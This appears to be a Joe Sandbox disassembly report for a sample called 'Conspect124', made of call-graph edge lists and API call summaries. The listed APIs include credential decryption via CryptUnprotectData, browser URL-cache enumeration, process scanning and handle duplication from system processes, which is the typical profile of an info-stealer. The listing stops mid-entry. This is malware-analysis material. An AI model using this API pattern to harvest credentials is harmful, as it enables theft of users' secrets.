38389->38391 38392 413643 38390->38392 38391->38388 38393 413648 38391->38393 38392->38152 38394 413658 38393->38394 38395 4135e0 FreeLibrary 38393->38395 38394->38152 38396 413666 38395->38396 38396->38152 39073 4449b9 38397->39073 38400 444c1f 38400->38133 38401 4449b9 42 API calls 38403 444b4b 38401->38403 38402 444c15 38405 4449b9 42 API calls 38402->38405 38403->38402 39094 444972 GetVersionExW 38403->39094 38405->38400 38406 444b99 memcmp 38411 444b8c 38406->38411 38407 444c0b 39098 444a85 42 API calls 38407->39098 38411->38406 38411->38407 39095 444aa5 42 API calls 38411->39095 39096 40a7a0 GetVersionExW 38411->39096 39097 444a85 42 API calls 38411->39097 38414 40399d 38413->38414 39099 403a16 38414->39099 38417 403a12 wcsrchr 38417->38150 38418 4039a3 38421 4039f4 38418->38421 38423 403a09 38418->38423 39110 40a02c CreateFileW 38418->39110 38422 4099c6 2 API calls 38421->38422 38421->38423 38422->38423 39113 40b1ab free free 38423->39113 38425 414c2e 17 API calls 38424->38425 38426 404048 38425->38426 38427 414c2e 17 API calls 38426->38427 38428 404056 38427->38428 38429 409d1f 6 API calls 38428->38429 38430 404073 38429->38430 38431 409d1f 6 API calls 38430->38431 38432 40408e 38431->38432 38433 409d1f 6 API calls 38432->38433 38434 4040a6 38433->38434 38435 403af5 20 API calls 38434->38435 38436 4040ba 38435->38436 38437 403af5 20 API calls 38436->38437 38438 4040cb 38437->38438 39140 40414f memset 38438->39140 38440 404140 39154 40b1ab free free 38440->39154 38442 4040ec memset 38445 4040e0 38442->38445 38443 404148 38443->38205 38444 4099c6 2 API calls 38444->38445 38445->38440 38445->38442 38445->38444 38446 40a8ab 9 API calls 38445->38446 38446->38445 39167 40a6e6 WideCharToMultiByte 38447->39167 38449 4087ed 39168 4095d9 memset 38449->39168 38452 408809 memset memset memset memset memset 38453 40b2cc 27 API calls 38452->38453 38454 4088a1 38453->38454 38455 409d1f 6 API calls 38454->38455 38456 4088b1 38455->38456 38457 40b2cc 27 API calls 
38456->38457 38458 4088c0 38457->38458 38459 409d1f 6 API calls 38458->38459 38460 4088d0 38459->38460 38461 40b2cc 27 API calls 38460->38461 38462 4088df 38461->38462 38463 409d1f 6 API calls 38462->38463 38464 4088ef 38463->38464 38465 40b2cc 27 API calls 38464->38465 38466 4088fe 38465->38466 38467 409d1f 6 API calls 38466->38467 38468 40890e 38467->38468 38469 40b2cc 27 API calls 38468->38469 38470 40891d 38469->38470 38480 408953 38480->38205 38499 40b633 free 38498->38499 38500 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38499->38500 38501 413f00 Process32NextW 38500->38501 38502 413da5 OpenProcess 38501->38502 38503 413f17 CloseHandle 38501->38503 38504 413df3 memset 38502->38504 38508 413eb0 38502->38508 38503->38244 39593 413f27 38504->39593 38506 413ebf free 38506->38508 38507 413e1f 38510 413e37 GetModuleHandleW 38507->38510 39598 413959 38507->39598 39614 413ca4 38507->39614 38508->38501 38508->38506 38509 4099f4 3 API calls 38508->38509 38509->38508 38510->38507 38512 413e46 GetProcAddress 38510->38512 38512->38507 38514 413ea2 CloseHandle 38514->38508 38516 414c2e 17 API calls 38515->38516 38517 403eb7 38516->38517 38518 414c2e 17 API calls 38517->38518 38519 403ec5 38518->38519 38520 409d1f 6 API calls 38519->38520 38521 403ee2 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 403efd 38522->38523 38524 409d1f 6 API calls 38523->38524 38525 403f15 38524->38525 38526 403af5 20 API calls 38525->38526 38527 403f29 38526->38527 38528 403af5 20 API calls 38527->38528 38529 403f3a 38528->38529 38530 40414f 33 API calls 38529->38530 38536 403f4f 38530->38536 38531 403faf 39628 40b1ab free free 38531->39628 38533 403f5b memset 38533->38536 38534 403fb7 38534->38190 38535 4099c6 2 API calls 38535->38536 38536->38531 38536->38533 38536->38535 38537 40a8ab 9 API calls 38536->38537 38537->38536 38539 414c2e 17 API calls 38538->38539 38540 403d26 38539->38540 38541 414c2e 17 API calls 38540->38541 38542 403d34 38541->38542 38543 409d1f 6 API 
calls 38542->38543 38544 403d51 38543->38544 38545 409d1f 6 API calls 38544->38545 38546 403d6c 38545->38546 38547 409d1f 6 API calls 38546->38547 38548 403d84 38547->38548 38549 403af5 20 API calls 38548->38549 38550 403d98 38549->38550 38551 403af5 20 API calls 38550->38551 38552 403da9 38551->38552 38553 40414f 33 API calls 38552->38553 38559 403dbe 38553->38559 38554 403e1e 39629 40b1ab free free 38554->39629 38556 403dca memset 38556->38559 38557 403e26 38557->38193 38558 4099c6 2 API calls 38558->38559 38559->38554 38559->38556 38559->38558 38560 40a8ab 9 API calls 38559->38560 38560->38559 38562 414b81 9 API calls 38561->38562 38563 414c40 38562->38563 38564 414c73 memset 38563->38564 39630 409cea 38563->39630 38566 414c94 38564->38566 39633 414592 RegOpenKeyExW 38566->39633 38568 414c64 SHGetSpecialFolderPathW 38570 414d0b 38568->38570 38570->38185 38571 414cf4 wcscpy 38571->38570 38572 414cc1 38572->38571 39634 414bb0 wcscpy 38572->39634 38574 414cd2 39635 4145ac RegQueryValueExW 38574->39635 38576 414ce9 RegCloseKey 38576->38571 38578 409d62 38577->38578 38579 409d43 wcscpy 38577->38579 38578->38224 38580 409719 2 API calls 38579->38580 38581 409d51 wcscat 38580->38581 38581->38578 38583 40aebe FindClose 38582->38583 38584 40ae21 38583->38584 38585 4099c6 2 API calls 38584->38585 38586 40ae35 38585->38586 38587 409d1f 6 API calls 38586->38587 38588 40ae49 38587->38588 38588->38289 38590 40ade0 38589->38590 38591 40ae0f 38589->38591 38590->38591 38592 40ade7 wcscmp 38590->38592 38591->38289 38592->38591 38593 40adfe wcscmp 38592->38593 38593->38591 38595 40ae18 9 API calls 38594->38595 38597 4453c4 38595->38597 38596 40ae51 9 API calls 38596->38597 38597->38596 38598 4453f3 38597->38598 38599 40add4 2 API calls 38597->38599 38602 445403 254 API calls 38597->38602 38600 40aebe FindClose 38598->38600 38599->38597 38601 4453fe 38600->38601 38601->38289 38602->38597 38604 40ae7b FindNextFileW 38603->38604 38605 40ae5c FindFirstFileW 38603->38605 38606 40ae94 
38604->38606 38607 40ae8f 38604->38607 38605->38606 38609 40aeb6 38606->38609 38610 409d1f 6 API calls 38606->38610 38608 40aebe FindClose 38607->38608 38608->38606 38609->38289 38610->38609 38611->38173 38612->38154 38613->38247 38614->38231 38615->38231 38616->38262 38618 409c89 38617->38618 38618->38285 38619->38314 38621 413d39 38620->38621 38622 413d2f FreeLibrary 38620->38622 38623 40b633 free 38621->38623 38622->38621 38624 413d42 38623->38624 38625 40b633 free 38624->38625 38626 413d4a 38625->38626 38626->38146 38627->38153 38628->38141 38629->38217 38631 44db70 38630->38631 38632 40b6fc memset 38631->38632 38633 409c70 2 API calls 38632->38633 38634 40b732 wcsrchr 38633->38634 38635 40b743 38634->38635 38636 40b746 memset 38634->38636 38635->38636 38637 40b2cc 27 API calls 38636->38637 38638 40b76f 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40b783 38639->38640 39636 409b98 GetFileAttributesW 38640->39636 38642 40b792 38643 40b7c2 38642->38643 38644 409c70 2 API calls 38642->38644 39637 40bb98 38643->39637 38646 40b7a5 38644->38646 38650 40b2cc 27 API calls 38646->38650 38648 40b837 CloseHandle 38652 40b83e memset 38648->38652 38649 40b817 38651 409a45 3 API calls 38649->38651 38653 40b7b2 38650->38653 38654 40b827 CopyFileW 38651->38654 39670 40a6e6 WideCharToMultiByte 38652->39670 38656 409d1f 6 API calls 38653->38656 38654->38652 38656->38643 38657 40b866 38658 444432 121 API calls 38657->38658 38659 40b879 38658->38659 38660 40bad5 38659->38660 38661 40b273 27 API calls 38659->38661 38662 40baeb 38660->38662 38663 40bade DeleteFileW 38660->38663 38664 40b89a 38661->38664 38665 40b04b ??3@YAXPAX 38662->38665 38663->38662 38667 438552 134 API calls 38664->38667 38666 40baf3 38665->38666 38666->38143 38668 40b8a4 38667->38668 38669 40bacd 38668->38669 38671 4251c4 137 API calls 38668->38671 38670 443d90 111 API calls 38669->38670 38670->38660 38693 40b8b8 38671->38693 38672 40bac6 39680 424f26 123 API calls 38672->39680 38673 40b8bd memset 
39671 425413 17 API calls 38673->39671 38676 425413 17 API calls 38676->38693 38679 40a71b MultiByteToWideChar 38679->38693 38682 40b9b5 memcmp 38682->38693 38683 4099c6 2 API calls 38683->38693 38684 404423 38 API calls 38684->38693 38687 4251c4 137 API calls 38687->38693 38688 40bb3e memset memcpy 39681 40a734 MultiByteToWideChar 38688->39681 38690 40bb88 LocalFree 38690->38693 38693->38672 38693->38673 38693->38676 38693->38679 38693->38682 38693->38683 38693->38684 38693->38687 38693->38688 38694 40ba5f memcmp 38693->38694 38695 40a734 MultiByteToWideChar 38693->38695 39672 4253ef 16 API calls 38693->39672 39673 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38693->39673 39674 4253af 17 API calls 38693->39674 39675 4253cf 17 API calls 38693->39675 39676 447280 memset 38693->39676 39677 447960 memset memcpy memcpy memcpy 38693->39677 39678 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38693->39678 39679 447920 memcpy memcpy memcpy 38693->39679 38694->38693 38695->38693 38696->38220 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38157 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38204 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39768 409b98 GetFileAttributesW 38707->39768 38709 44545e 38710 445476 38709->38710 38711 40b6ef 253 API calls 38709->38711 38712 40b2cc 27 API calls 38710->38712 38711->38710 38713 445482 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39769 409b98 GetFileAttributesW 38715->39769 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 253 API calls 38717->38719 38718->38229 38719->38718 38720->38228 38721->38252 38722->38255 38723->38292 38724->38274 38725->38321 38726->38321 38727->38303 38728->38333 38729->38335 38730->38337 38732 414c2e 17 API calls 38731->38732 38733 40c2ae 38732->38733 38803 40c1d3 38733->38803 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 
2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38747 40a8ab 9 API calls 38744->38747 38745->38742 38746 40c373 GetLastError 38745->38746 38748 40c3ad FindCloseUrlCache 38746->38748 38749 40c37e 38746->38749 38750 40c33e wcschr 38747->38750 38748->38741 38751 40afcf 2 API calls 38749->38751 38750->38745 38752 40c34f 38750->38752 38753 40c391 FindNextUrlCacheEntryW 38751->38753 38754 40a8ab 9 API calls 38752->38754 38753->38742 38753->38748 38754->38745 38958 40a97a 38755->38958 38758 40a8cc 38758->38344 38759 40a8d0 7 API calls 38759->38758 38963 40b1ab free free 38760->38963 38762 40c3dd 38763 40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38964 414592 RegOpenKeyExW 38764->38964 38766 40c3f4 38767 40c50e 38766->38767 38768 40c3ff 38766->38768 38782 405337 38767->38782 38769 40a9ce 4 API calls 38768->38769 38770 40c418 memset 38769->38770 38965 40aa1d 38770->38965 38773 40c471 38775 40c47a _wcsupr 38773->38775 38774 40c505 RegCloseKey 38774->38767 38776 40a8d0 7 API calls 38775->38776 38777 40c498 38776->38777 38778 40a8d0 7 API calls 38777->38778 38779 40c4ac memset 38778->38779 38780 40aa1d 38779->38780 38781 40c4e4 RegEnumValueW 38780->38781 38781->38774 38781->38775 38967 405220 38782->38967 38786 4099c6 2 API calls 38785->38786 38787 40a714 _wcslwr 38786->38787 38788 40c634 38787->38788 39024 405361 38788->39024 38791 40c65c wcslen 39027 4053b6 39 API calls 38791->39027 38792 40c71d wcslen 38792->38358 38794 40c677 38795 40c713 38794->38795 39028 40538b 39 API calls 38794->39028 39030 4053df 39 API calls 38795->39030 38798 40c6a5 38798->38795 38799 40c6a9 memset 38798->38799 38800 40c6d3 38799->38800 39029 40c589 44 API calls 38800->39029 38802->38351 38804 40ae18 9 API calls 38803->38804 38810 40c210 38804->38810 38805 40ae51 9 API calls 38805->38810 
[Call-graph edge list exported from the report's rendered graph viewer (node id, code address, imported API names, node->node edges). The rendered graph itself is not recoverable in this text form; the per-function API call lists below carry the same information in readable form.]

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      [Control-flow graph of the function at 0040DD85: basic-block address ranges (40dd85 through 40e01b) and block-to-block edges exported from the rendered graph viewer. The rendered graph is not recoverable here; the APIs this function calls are listed below.]
                                      APIs
                                      • memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                      • memset.MSVCRT ref: 0040DF5F
                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                      • API String ID: 708747863-3398334509
                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                      Control-flow Graph

                                      [Control-flow graph of the function at 00413D4C: basic-block address ranges (413d4c through 413f24) and block-to-block edges exported from the rendered graph viewer. The rendered graph is not recoverable here; the APIs this function calls are listed below.]
                                      APIs
                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                      • memset.MSVCRT ref: 00413D7F
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                      • memset.MSVCRT ref: 00413E07
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                      • free.MSVCRT ref: 00413EC1
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                      • API String ID: 1344430650-1740548384
                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                      Control-flow Graph

                                      control_flow_graph 696 40b58d-40b59e 697 40b5a4-40b5c0 GetModuleHandleW FindResourceW 696->697 698 40b62e-40b632 696->698 699 40b5c2-40b5ce LoadResource 697->699 700 40b5e7 697->700 699->700 701 40b5d0-40b5e5 SizeofResource LockResource 699->701 702 40b5e9-40b5eb 700->702 701->702 702->698 703 40b5ed-40b5ef 702->703 703->698 704 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 703->704 704->698
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                      • String ID: AE$BIN
                                      • API String ID: 1668488027-3931574542
                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 767404330-0
                                      • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                      • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                      APIs
                                      • memset.MSVCRT ref: 0041898C
                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: InfoSystemmemset
                                      • String ID:
                                      • API String ID: 3558857096-0
                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                      Control-flow Graph

                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 41 445823-445826 14->41 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 50 445879-44587c 18->50 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 32 445605-445607 22->32 33 445603 22->33 30 4459f2-4459fa 23->30 31 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->31 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 43 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 30->43 44 445b29-445b32 30->44 145 4459d0-4459e8 call 40b6ef 31->145 146 4459ed 31->146 32->21 37 445609-44560d 32->37 33->32 37->21 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 37->48 38->3 39->38 51 44584c-445854 call 40b1ab 41->51 52 445828 41->52 182 445b08-445b15 call 40ae51 43->182 53 445c7c-445c85 44->53 54 445b38-445b96 memset * 3 44->54 156 445665-445670 call 40b1ab 48->156 157 445643-445663 call 40a9b5 call 4087b3 48->157 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 82 445fae-445fb2 60->82 83 445d2b-445d3b 60->83 160 445cf5 61->160 161 445cfc-445d03 61->161 64->19 75 445884-44589d call 40a9b5 call 4087b3 65->75 143 445849 66->143 249 445c77 67->249 68->67 76 445ba2-445bcf call 4099c6 call 445403 call 445389 68->76 148 44589f 75->148 76->53 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 110 4456ba-4456c4 78->110 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 193 445e17 99->193 194 445e1e-445e25 99->194 123 4457f9 110->123 124 4456ca-4456d3 call 413cfa call 413d4c 110->124 123->6 174 4456d8-4456f7 call 40b2cc call 413fa6 124->174 140->141 141->23 143->51 145->146 146->30 148->64 150->78 150->93 156->110 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->60 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 193->194 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 194->198 199 445e6b-445e7e call 445093 194->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 